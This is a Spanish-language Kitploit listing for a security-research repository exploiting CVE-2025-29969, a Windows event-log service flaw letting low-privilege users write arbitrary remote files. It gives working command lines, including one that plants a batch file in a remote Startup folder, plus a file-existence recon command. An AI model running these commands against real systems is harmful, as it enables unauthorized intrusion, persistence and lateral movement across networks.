Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
EventLogin-CVE-2025-29969 — Explotación de CVE-2025-29969 | Kitploit
Herramientas/GitHubGitHub/safebreach-labs/eventlogin-cve-2025-29969
Escalada de PrivilegiosReconocimientoAnálisis de VulnerabilidadesExplotaciónMovimiento LateralPruebas de Penetración
GitHubsafebreach-labs/eventlogin-cve-2025-29969

EventLogin-CVE-2025-29969

Explotación de CVE-2025-29969

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
69154hace 6 mesesRevisado por Kitploit

EventLogin - CVE-2025-29969

EventLogin es una vulnerabilidad de tiempo de verificación a tiempo de uso en el protocolo MS-EVEN. La vulnerabilidad permite a usuarios con bajos privilegios escribir archivos arbitrarios en una máquina remota, evitando efectivamente la necesidad de una cuenta de Administrador para una escritura remota.

Hay dos scripts en este repositorio: uno explota la vulnerabilidad (write_file_remotely.py) y el otro utiliza una de las primitivas de la vulnerabilidad para verificar si un archivo remoto existe o no, como un usuario con bajos privilegios, lo cual es útil, por ejemplo, para ver programas instalados en otros equipos del dominio.

Puedes leer el análisis completo aquí:

EventLog-in: Propagando con Credenciales Débiles Usando el Servicio de Eventlog en Microsoft Windows

Uso de write_file_remotely

Primero, crea un recurso compartido SMB usando impacket:

root@kitploit:~
impacket-smbserver -smb2support Share /tmp/safebreach

Nota: el script usa 'Share' como nombre del recurso compartido codificado, modifícalo si es necesario.

Luego, ejecuta el script write_file_remotely.py e incluye todos los parámetros requeridos:

  1. ip_to_attack - La IP de la máquina remota.
  2. smb_server_ip - La IP de la máquina en la que abriste el recurso compartido, puede ser la máquina atacante.
  3. username y password - Las credenciales de la cuenta con bajos privilegios.
  4. valid_evtx_file_path - Una ruta a un archivo EVTX válido que almacenas en el mismo recurso compartido que abriste antes.
  5. local_file_path - El archivo que deseas subir.
  6. remote_file_path - La ruta remota del archivo a la que deseas subir.

Ejemplo:

root@kitploit:~
python write_file_remotely.py 192.168.56.102 192.168.56.105 lowuser Test123 "/tmp/safebreach/Sample.evtx" "calc.bat" "C:\\Users\\lowuser\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\target.bat"

Uso de check_if_exists

Este script no utiliza la vulnerabilidad en sí, solo emplea la primitiva 'CreateFile' y puede ayudarte a reconocer la red.

Por ejemplo, el directorio Program Files de una máquina remota en un dominio es accesible para todo el grupo 'Users', lo que significa que usando credenciales de CUALQUIER usuario puedes verificar si un archivo existe o no en otra máquina.

Acepta los siguientes parámetros:

  1. ip_to_attack - IP a reconocer
  2. username - nombre de usuario y contraseña de usuario del dominio.
  3. filepath_to_check - un archivo para verificar

Por ejemplo, verifica si wireshark está instalado en el DC (192.168.56.57) usando un usuario con bajos privilegios.

root@kitploit:~
python check_if_exists.py 192.168.56.57 lowuser Password1! "C:\Program Files\Wireshark"

Result:
FILE_EXISTS_AND_IS_DIRECTORY
Descargar herramienta